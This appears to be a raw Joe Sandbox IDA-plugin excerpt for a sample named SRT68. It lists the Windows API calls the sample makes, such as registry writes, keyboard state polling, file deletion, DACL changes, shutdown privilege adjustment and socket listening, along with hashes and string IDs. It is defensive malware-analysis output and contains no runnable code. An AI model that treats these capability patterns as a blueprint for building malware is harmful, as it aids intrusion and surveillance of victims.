                                                                      • Instruction Fuzzy Hash: B931F43250021B6BEB31EEA5DC49EEE77FC9F452A0F14419AF984E2090DB35DA44DB50
                                                                      APIs
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01020953
                                                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,0102F910,00000000,?,00000000,?,?), ref: 010209C1
                                                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01020A09
                                                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01020A92
                                                                      • RegCloseKey.ADVAPI32(?), ref: 01020DB2
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 01020DBF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectCreateRegistryValue
                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                      • API String ID: 536824911-966354055
                                                                      • Opcode ID: 9dfcf9985993bec03e24709a966fc37b606f5af798c4618422942e40d2919295
                                                                      • Instruction ID: 0e341d9e5c0d9f79f080165de07775785d241d70eff21a732e4ae3e4d6849533
                                                                      • Opcode Fuzzy Hash: 9dfcf9985993bec03e24709a966fc37b606f5af798c4618422942e40d2919295
                                                                      • Instruction Fuzzy Hash: 770259756046119FDB54EF18C881E2AB7E5FF8A314F04846DF98A9B362CB78ED01DB81
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0100F113
                                                                      • _wcscmp.LIBCMT ref: 0100F128
                                                                      • _wcscmp.LIBCMT ref: 0100F13F
                                                                        • Part of subcall function 01004385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 010043A0
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0100F16E
                                                                      • FindClose.KERNEL32(00000000), ref: 0100F179
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 0100F195
                                                                      • _wcscmp.LIBCMT ref: 0100F1BC
                                                                      • _wcscmp.LIBCMT ref: 0100F1D3
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0100F1E5
                                                                      • SetCurrentDirectoryW.KERNEL32(01058920), ref: 0100F203
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0100F20D
                                                                      • FindClose.KERNEL32(00000000), ref: 0100F21A
                                                                      • FindClose.KERNEL32(00000000), ref: 0100F22C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 1824444939-438819550
                                                                      • Opcode ID: e0b9251d9f21f244c75fed19720a8574cedd44898b61f5f71d77ac7f219a1c35
                                                                      • Instruction ID: 7b7b9736f43d731fca2f758f3501b8a941cc16de2233ef878a82ae24404b9cc1
                                                                      • Opcode Fuzzy Hash: e0b9251d9f21f244c75fed19720a8574cedd44898b61f5f71d77ac7f219a1c35
                                                                      • Instruction Fuzzy Hash: 9731483650021B7BEB32EEA8EC49EDE77BC9F462A0F144199E980E20D0DB35DA44DB54
                                                                      APIs
                                                                      • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0100A20F
                                                                      • __swprintf.LIBCMT ref: 0100A231
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0100A26E
                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0100A293
                                                                      • _memset.LIBCMT ref: 0100A2B2
                                                                      • _wcsncpy.LIBCMT ref: 0100A2EE
                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0100A323
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0100A32E
                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 0100A337
                                                                      • CloseHandle.KERNEL32(00000000), ref: 0100A341
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                      • String ID: :$\$\??\%s
                                                                      • API String ID: 2733774712-3457252023
                                                                      • Opcode ID: bd371c39ec16f3082b3b2e8187dcc58826f531a071f37454338fa6020e241760
                                                                      • Instruction ID: a460a54c674edf53c5b236379cd806aa9e01ea84f83c734dd5732a822f50802e
                                                                      • Opcode Fuzzy Hash: bd371c39ec16f3082b3b2e8187dcc58826f531a071f37454338fa6020e241760
                                                                      • Instruction Fuzzy Hash: B831C37160020AABEB31DFA4DC49FEB37BCEF89740F1041B6FA49D2190EB7592448B24
                                                                      APIs
                                                                        • Part of subcall function 00FF8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FF821E
                                                                        • Part of subcall function 00FF8202: GetLastError.KERNEL32(?,00FF7CE2,?,?,?), ref: 00FF8228
                                                                        • Part of subcall function 00FF8202: GetProcessHeap.KERNEL32(00000008,?,?,00FF7CE2,?,?,?), ref: 00FF8237
                                                                        • Part of subcall function 00FF8202: HeapAlloc.KERNEL32(00000000,?,00FF7CE2,?,?,?), ref: 00FF823E
                                                                        • Part of subcall function 00FF8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FF8255
                                                                        • Part of subcall function 00FF829F: GetProcessHeap.KERNEL32(00000008,00FF7CF8,00000000,00000000,?,00FF7CF8,?), ref: 00FF82AB
                                                                        • Part of subcall function 00FF829F: HeapAlloc.KERNEL32(00000000,?,00FF7CF8,?), ref: 00FF82B2
                                                                        • Part of subcall function 00FF829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FF7CF8,?), ref: 00FF82C3
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FF7D13
                                                                      • _memset.LIBCMT ref: 00FF7D28
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FF7D47
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00FF7D58
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00FF7D95
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FF7DB1
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00FF7DCE
                                                                      • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FF7DDD
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00FF7DE4
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FF7E05
                                                                      • CopySid.ADVAPI32(00000000), ref: 00FF7E0C
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FF7E3D
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FF7E63
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FF7E77
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                      • String ID:
                                                                      • API String ID: 3996160137-0
                                                                      • Opcode ID: 50a047ec84e28b4e85e25dc986db6943bc918944afb45f9e2b4415b08e0bde73
                                                                      • Instruction ID: e9045246318ae1338ff3d92b9ca423175f03e772de8ace82c5bcbbcd2d0e7f5a
                                                                      • Opcode Fuzzy Hash: 50a047ec84e28b4e85e25dc986db6943bc918944afb45f9e2b4415b08e0bde73
                                                                      • Instruction Fuzzy Hash: A6615C7190020AAFDF209FA0DC85EBEFB79FF04750F14815AFA15A6290DB399A05DB60
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                      • API String ID: 0-4052911093
                                                                      • Opcode ID: aa3c1376444f65c066839e952ec9ca4e0f394484d103e2930eeb6f3b775765b0
                                                                      • Instruction ID: e3e9a64ca60cba25b6267887289849cc1f2cc6d6f501cae8058147f86573a48c
                                                                      • Opcode Fuzzy Hash: aa3c1376444f65c066839e952ec9ca4e0f394484d103e2930eeb6f3b775765b0
                                                                      • Instruction Fuzzy Hash: A2724DB5E00219DBDB24CF59C8807FEB7B5BF44720F24816AE949EB290DB349941EF90
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 01000097
                                                                      • SetKeyboardState.USER32(?), ref: 01000102
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 01000122
                                                                      • GetKeyState.USER32(000000A0), ref: 01000139
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 01000168
                                                                      • GetKeyState.USER32(000000A1), ref: 01000179
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 010001A5
                                                                      • GetKeyState.USER32(00000011), ref: 010001B3
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 010001DC
                                                                      • GetKeyState.USER32(00000012), ref: 010001EA
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 01000213
                                                                      • GetKeyState.USER32(0000005B), ref: 01000221
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: d6be4d8be4fb27b002b83c80ae8b1999ee5dbdefaafed7b5d50eaab9ab44a1eb
                                                                      • Instruction ID: cfdbd3c827603eb776450619f179da07343ff48784ec00488a3b590b1397e314
                                                                      • Opcode Fuzzy Hash: d6be4d8be4fb27b002b83c80ae8b1999ee5dbdefaafed7b5d50eaab9ab44a1eb
                                                                      • Instruction Fuzzy Hash: 9351F83090478929FB77DBA888147EABFF49F022C0F0845DEE6C6565C7DAA4978CC761
                                                                      APIs
                                                                        • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010204AC
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0102054B
                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 010205E3
                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01020822
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0102082F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 1240663315-0
                                                                      • Opcode ID: 8c92f0abbac997c4a1f6ecbe8085b9d7dc263f91af299cac6473bd59c48f528c
                                                                      • Instruction ID: b1c91c5d906a95acdbc0a2d98e614de29387b64d8dd273b76aa7ffe5f0220598
                                                                      • Opcode Fuzzy Hash: 8c92f0abbac997c4a1f6ecbe8085b9d7dc263f91af299cac6473bd59c48f528c
                                                                      • Instruction Fuzzy Hash: 46E17B70604314AFCB14DF28C885E6BBBE4FF89714F04896DF88ADB265DA34E905CB91
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: 0b4310cc4825c38a39b80cd52ae253495fbc51edcbc06ef9320cf37af7b9c6c2
                                                                      • Instruction ID: ea8c77509d30e780a68f56b836da90868b32d9bc4cdbc6a25b3655d383724202
                                                                      • Opcode Fuzzy Hash: 0b4310cc4825c38a39b80cd52ae253495fbc51edcbc06ef9320cf37af7b9c6c2
                                                                      • Instruction Fuzzy Hash: 632180753002119FDB31AF64DC09B6D7BA8EF06750F14801AF986DB265DB7DA800CB54
                                                                      APIs
                                                                        • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                        • Part of subcall function 01004A31: GetFileAttributesW.KERNEL32(?,0100370B), ref: 01004A32
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 010038A3
                                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0100394B
                                                                      • MoveFileW.KERNEL32(?,?), ref: 0100395E
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0100397B
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0100399D
                                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 010039B9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 4002782344-1173974218
                                                                      • Opcode ID: 67ddf9d8e18b467618a76196a07405ea6ca357344cca0717a92ca07040b3af0e
                                                                      • Instruction ID: de19aeda0325bf6101876369d64fa02f1fca59fa3dd1b79d35b17fce6afbe11e
                                                                      • Opcode Fuzzy Hash: 67ddf9d8e18b467618a76196a07405ea6ca357344cca0717a92ca07040b3af0e
                                                                      • Instruction Fuzzy Hash: 94519F7180414D9EDF17FBA4DE92DEEB7B9AF16300F6000A9E441BA191EB256F0DDB60
                                                                      APIs
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0100F440
                                                                      • Sleep.KERNEL32(0000000A), ref: 0100F470
                                                                      • _wcscmp.LIBCMT ref: 0100F484
                                                                      • _wcscmp.LIBCMT ref: 0100F49F
                                                                      • FindNextFileW.KERNEL32(?,?), ref: 0100F53D
                                                                      • FindClose.KERNEL32(00000000), ref: 0100F553
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                      • String ID: *.*
                                                                      • API String ID: 713712311-438819550
                                                                      • Opcode ID: 2dafe8cc2a5f3b6c0ea4c4577722de3f91e57f63eb5998ecd5591b7693930b26
                                                                      • Instruction ID: 2bf4f24f8752b662f9ad23c676ca7daa1ca69581538781f8d56fa87e32a001ae
                                                                      • Opcode Fuzzy Hash: 2dafe8cc2a5f3b6c0ea4c4577722de3f91e57f63eb5998ecd5591b7693930b26
                                                                      • Instruction Fuzzy Hash: 6941E07180020BAFEF61EF68CC49AEEBBB4FF05350F14409AE985A3191DB359A84DF50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID:
                                                                      • API String ID: 4104443479-0
                                                                      • Opcode ID: c9ef0eb2d13b795c23cde51e1806515ce6a4ba18bba470b138331c2659683db5
                                                                      • Instruction ID: 8405206fad9e270e12bf72914d91ed2ac0722557f94aadbda43088234a9cc45f
                                                                      • Opcode Fuzzy Hash: c9ef0eb2d13b795c23cde51e1806515ce6a4ba18bba470b138331c2659683db5
                                                                      • Instruction Fuzzy Hash: 5F129B70A0060ADFDF14DFA5C981AEEB7F5FF48310F104529E846E7251EB3AA915EB50
                                                                      APIs
                                                                        • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
                                                                        • Part of subcall function 01004A31: GetFileAttributesW.KERNEL32(?,0100370B), ref: 01004A32
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 01003B89
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 01003BD9
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 01003BEA
                                                                      • FindClose.KERNEL32(00000000), ref: 01003C01
                                                                      • FindClose.KERNEL32(00000000), ref: 01003C0A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: 9cbb46caf6486ed5eb38368d9713633468e27462e7963c49c754f2ca40454d93
                                                                      • Instruction ID: 27a1480aa44e44c3ecbd10981aa19181102e12c95e7c5d13a74a9fc23d416237
                                                                      • Opcode Fuzzy Hash: 9cbb46caf6486ed5eb38368d9713633468e27462e7963c49c754f2ca40454d93
                                                                      • Instruction Fuzzy Hash: E9317C710083859FD316EF24DC91DAFBBE8BE96214F404D1DF4D586192EB29DA08DB62
                                                                      APIs
                                                                        • Part of subcall function 00FF87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FF882B
                                                                        • Part of subcall function 00FF87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FF8858
                                                                        • Part of subcall function 00FF87E1: GetLastError.KERNEL32 ref: 00FF8865
                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 010051F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                      • String ID: $@$SeShutdownPrivilege
                                                                      • API String ID: 2234035333-194228
                                                                      • Opcode ID: 6f942d3e2bf1eb797f76696e46b4f32783daea79fb4a5a4fbbddea1d8e70f908
                                                                      • Instruction ID: 42d4a71b61fd76e3d1c1b3781746222ed607c5c0e96b30ef608f7976db1dc27d
                                                                      • Opcode Fuzzy Hash: 6f942d3e2bf1eb797f76696e46b4f32783daea79fb4a5a4fbbddea1d8e70f908
                                                                      • Instruction Fuzzy Hash: 84017B35791216ABF77A266C9C8AFBB72A8EF07380F100560FEC3E20C2D9551C008E90
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010162DC
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 010162EB
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 01016307
                                                                      • listen.WSOCK32(00000000,00000005), ref: 01016316
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 01016330
                                                                      • closesocket.WSOCK32(00000000,00000000), ref: 01016344
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                                      • String ID:
                                                                      • API String ID: 1279440585-0
                                                                      • Opcode ID: 1e48c39b159af124dd0fb8d02c1c6ec22c39770a09622a6cfe901af3dbb8dc44
                                                                      • Instruction ID: 70f6fdb9a06190fe1b5f68eb3902889e250f3f3c3f5fe2230ff9cb83d3bdf0c1
                                                                      • Opcode Fuzzy Hash: 1e48c39b159af124dd0fb8d02c1c6ec22c39770a09622a6cfe901af3dbb8dc44
